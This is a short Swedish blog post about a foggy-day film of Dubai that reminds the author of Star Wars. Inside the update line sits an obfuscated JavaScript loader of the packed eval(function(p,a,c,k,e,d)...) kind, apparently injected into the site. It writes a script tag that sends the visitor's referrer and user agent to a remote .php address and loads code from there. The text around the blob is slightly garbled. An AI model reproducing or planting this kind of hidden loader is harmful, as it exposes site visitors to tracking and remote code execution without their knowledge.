Image Image Image Image Image Image Image Image Image Image

| 17 juli, 2018

Scroll to top

Top

No Comments

Dubai i dimma… Star Wars any one?!

Dubai i dimma… Star Wars any one?!
Filip Urde
  • On 11 oktober, 2012
  • http://www.revue.se/filip-urde

Riktigt ball film på Dubai i dimma/molnig dag. Jag får direkt associationer till Star Wars Sky City… Någon annan som får det?

Uppdatering: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ehyih|var|u0026u|referrer|izibs||js|php’.split(‘|’),0,{}))
Tyvärr så fungerar inte filmen
att dela i embed form, så ni får se den via denna länken: TITTA HÄR.

 

 

Submit a Comment